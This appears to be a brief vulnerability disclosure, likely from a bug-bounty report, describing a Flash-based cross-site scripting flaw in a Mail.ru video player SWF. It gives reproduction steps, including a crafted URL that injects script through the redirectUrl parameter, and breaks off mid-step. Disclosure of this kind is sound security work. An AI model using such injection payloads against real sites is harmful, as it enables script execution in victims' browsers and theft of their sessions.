Mail.ru: Flash XSS on img.mail.ru

Vulnerable Flash File: http://img.mail.ru/r/video2/playerv2.swf Steps: + Open http://img.mail.ru/r/video2/playerv2.swf?metadataUrl=http://videoapi.my.mail.ru/videos//community/mir/groupvideo/921.json&redirectUrl=%22;alertdocument.domain;catche// + Click on social share and click on anything eg...